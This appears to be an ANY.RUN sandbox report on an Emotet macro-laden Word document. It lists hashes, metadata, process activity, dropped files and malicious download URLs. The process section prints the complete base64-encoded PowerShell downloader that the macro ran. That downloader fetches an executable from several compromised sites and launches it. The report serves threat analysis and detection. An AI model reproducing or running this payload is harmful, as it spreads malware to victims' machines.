analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

079518735993045233.doc

Full analysis: https://app.any.run/tasks/fc1a975d-cfb9-4b74-9b46-a651dbf63bba
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 00:33:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Incredible Soft Computer, Subject: Burgs, Author: Humberto Lockman, Keywords: Automotive & Kids, Comments: Poland, Template: Normal.dotm, Last Saved By: Alicia Bernhard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 13:56:00 2019, Last Saved Time/Date: Fri Oct 11 13:56:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5:

AB619F85278DAF9465EE88A105ED5A7A

SHA1:

3E15D236C66998B7EA5C375E850BC48389D4A2D0

SHA256:

BB8D98721DCBA1D7FC8E745496A527247FB563DE48207541A7AC36299AF79DA5

SSDEEP:

6144:oGTmkq2KUzSznLx36rRnQnT2PxQdDYsz3coF0HWz46H:oGTmkqLUGzt36s2Cd8sb5F00R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3980)
    • PowerShell script executed

      • powershell.exe (PID: 3980)
    • Creates files in the user directory

      • powershell.exe (PID: 3980)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2176)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2176)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Incredible Soft Computer
Subject: Burgs
Author: Humberto Lockman
Keywords: Automotive & Kids
Comments: Poland
Template: Normal.dotm
LastModifiedBy: Alicia Bernhard
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:11 12:56:00
ModifyDate: 2019:10:11 12:56:00
Pages: 1
Words: 29
Characters: 170
Security: None
CodePage: Windows Latin 1 (Western European)
Company: McClure Group
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 198
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Bartell
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2176"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\079518735993045233.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3980powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMgA1AHgANQBjADkAYwAwADAAMAA9ACcAeAA0AHgAYwBiADEAMAAwADMAeAAzADMAJwA7ACQAYwB4AGMAMgAwAGIAYwB4AGMAOQAwADUANgAgAD0AIAAnADcAMwAyACcAOwAkAHgAMAAzAGMAMwA1ADAANwA2AHgAMwAwADMAPQAnAGMAMQAwADUAYgAzADAAMwA1ADMAOQAnADsAJABjADkANQBjADUAMAA5ADAAMAA3ADAAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYwB4AGMAMgAwAGIAYwB4AGMAOQAwADUANgArACcALgBlAHgAZQAnADsAJAB4AGIAOQAwADcAMAB4ADAANwA5AHgAeAA9ACcAYgBjADkANQA0ADAAeAB4AGIANwAxADUANAAnADsAJABiAHgAMAAxADYAOQAwADkAMgA2ADAAMAB4AD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBCAGMAbABpAEUAbgBUADsAJABjADMANQA0ADIAMAA2ADEAMABjADMANQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AaQBrAGUAdgBpAHIAZABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAGkAMgBjADcAMQAzADEALwAqAGgAdAB0AHAAOgAvAC8AcgB1AHAAZQByAHQAcwBoAGUAcgB3AG8AbwBkAC4AYwBvAG0ALwBUAGUAbQBwAGwAYQB0AGUAcwAvAHkAdQBnADkAZABwAG8AOQA4ADEANQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAG8AYgBsAGUAcwBwAHIAbwBwAGUAcgB0AGkAZQBzAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwB3ADQAZAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAZQBuAGUAZABvAGwAbABzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvADIAbABvAGcANgAzADgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBrAHkAegBvAGMAbwBsAGwAZQBjAHQAaQBvAG4ALgBjAG8AbQAvAHYAZQBnAGsALwBwAGEAcABrAGEAYQAxADcALwBoAGIAOQAyADgANwAyADkAOQA3AC8AJwAuACIAcwBwAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAGMAMAA4ADgAMgAzADQAMgA3AGMANAAwAD0AJwBiADkANAAwADYANQBjADAAMAAyAHgANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA1ADgAMQB4ADEAMABjADAAMAA3ADAAIABpAG4AIAAkAGMAMwA1ADQAMgAwADYAMQAwAGMAMwA1ACkAewB0AHIAeQB7ACQAYgB4ADAAMQA2ADkAMAA5ADIANgAwADAAeAAuACIAZABgAE8AdwBuAGwATwBgAEEAZABGAEkATABFACIAKAAkAHgANQA4ADEAeAAxADAAYwAwADAANwAwACwAIAAkAGMAOQA1AGMANQAwADkAMAAwADcAMAAwACkAOwAkAHgANgBjADcAMAAyADkAMAA0ADQAeAA2AGIAPQAnAGIAeAAwADgAOQA3ADAAMAA4ADAAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAGMAOQA1AGMANQAwADkAMAAwADcAMAAwACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAyADkAOQA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAHQAIgAoACQAYwA5ADUAYwA1ADAAOQAwADAANwAwADAAKQA7ACQAYgA4ADAAYgA1AGMAYgAwADAAMQB4ADgANgA9ACcAYwB4ADMAMgA4ADYAMQAxADAANgAzACcAOwBiAHIAZQBhAGsAOwAkAGIAOQB4ADAANwB4AHgAOQAyADQAOAA4AHgAPQAnAGIANwBiAHgANgAwADAAMAA0ADEANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADAANwBiADAANAA1AGIAYwAxAHgAPQAnAHgANQA4ADkAOAA4AGMAeAA4ADEANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 894
Read events
1 093
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2176WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA8BE.tmp.cvr
MD5:
SHA256:
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F7L4KEMVQ17ZE5O7SYTJ.temp
MD5:
SHA256:
2176WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$9518735993045233.docpgc
MD5:C95C8FD111E0106A42EF574E2B65C672
SHA256:DBE9F29FD92997E988E95B4DF28578E9813BB4E8F077FF673CE8C1BC3108E1FD
2176WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E75550F.wmfwmf
MD5:EED82EDA3735CF1BE1B79CFA1AA0B00D
SHA256:0ED17C1F33205538C16C2E9C3B50671447400923577646425FCCEC3325638102
2176WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:45822EE62FC571A3151895E367644231
SHA256:EB3C643FA978D554A4FC475FB2EC2D439467CBEED53546B5218462C2B3EC2CB5
2176WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:E0FC66EEEE87F0AEFF22C30B35E7DB91
SHA256:7F27A6E9BC3A36093893E4B016534392A76D5F4A5459FF89E9B143CDDF408B15
2176WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1E783CB.wmfwmf
MD5:5D7E3BF92F6D2D03368C33E9810F79E0
SHA256:73940C219B1C81897E3B24C209F16739E939CCCC5E9F957B76FBA58892CD95C4
2176WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A67F0F5.wmfwmf
MD5:FE0C74428EB8DD4642851C6DC8388612
SHA256:C83A93BEDF9DBFF77F7B27E9E929DD355B67C129587F172327ABD9C010674BA9
2176WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A0875DA.wmfwmf
MD5:557C1AFAA6EF22EF70E60223B0FE0DA4
SHA256:E555B80667C082ABDD815AC5E0CF5E5EC7D68788404CE6664A65830D9569C0B5
2176WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3ACD813.wmfwmf
MD5:A21397E9DFF130045BC5886E7B679DC2
SHA256:96602B50759B12AFE2A748598C564CE77253B042840E910B0665D560EA51B533
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
12
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3980
powershell.exe
GET
301
160.153.93.130:80
http://www.mikevirdi.com/wp-admin/mi2c7131/
US
html
248 b
malicious
3980
powershell.exe
GET
301
45.56.100.50:80
http://www.denedolls.com/wp-content/upgrade/2log638/
US
html
162 b
malicious
3980
powershell.exe
GET
301
96.126.109.53:80
http://www.kyzocollection.com/vegk/papkaa17/hb92872997/
US
html
162 b
whitelisted
3980
powershell.exe
GET
404
77.92.74.183:80
http://rupertsherwood.com/Templates/yug9dpo98155/
GB
html
315 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3980
powershell.exe
107.180.27.177:443
www.noblesproperties.com
GoDaddy.com, LLC
US
unknown
3980
powershell.exe
160.153.93.130:80
www.mikevirdi.com
GoDaddy.com, LLC
US
suspicious
3980
powershell.exe
77.92.74.183:80
rupertsherwood.com
UK-2 Limited
GB
suspicious
3980
powershell.exe
45.56.100.50:80
www.denedolls.com
Linode, LLC
US
unknown
3980
powershell.exe
160.153.93.130:443
www.mikevirdi.com
GoDaddy.com, LLC
US
suspicious
3980
powershell.exe
96.126.109.53:80
www.kyzocollection.com
Linode, LLC
US
unknown
3980
powershell.exe
96.126.109.53:443
www.kyzocollection.com
Linode, LLC
US
unknown
3980
powershell.exe
45.56.100.50:443
www.denedolls.com
Linode, LLC
US
unknown

DNS requests

Domain
IP
Reputation
www.mikevirdi.com
  • 160.153.93.130
malicious
mikevirdi.com
  • 160.153.93.130
malicious
rupertsherwood.com
  • 77.92.74.183
unknown
www.noblesproperties.com
  • 107.180.27.177
unknown
www.denedolls.com
  • 45.56.100.50
malicious
www.kyzocollection.com
  • 96.126.109.53
whitelisted

Threats

No threats detected
No debug info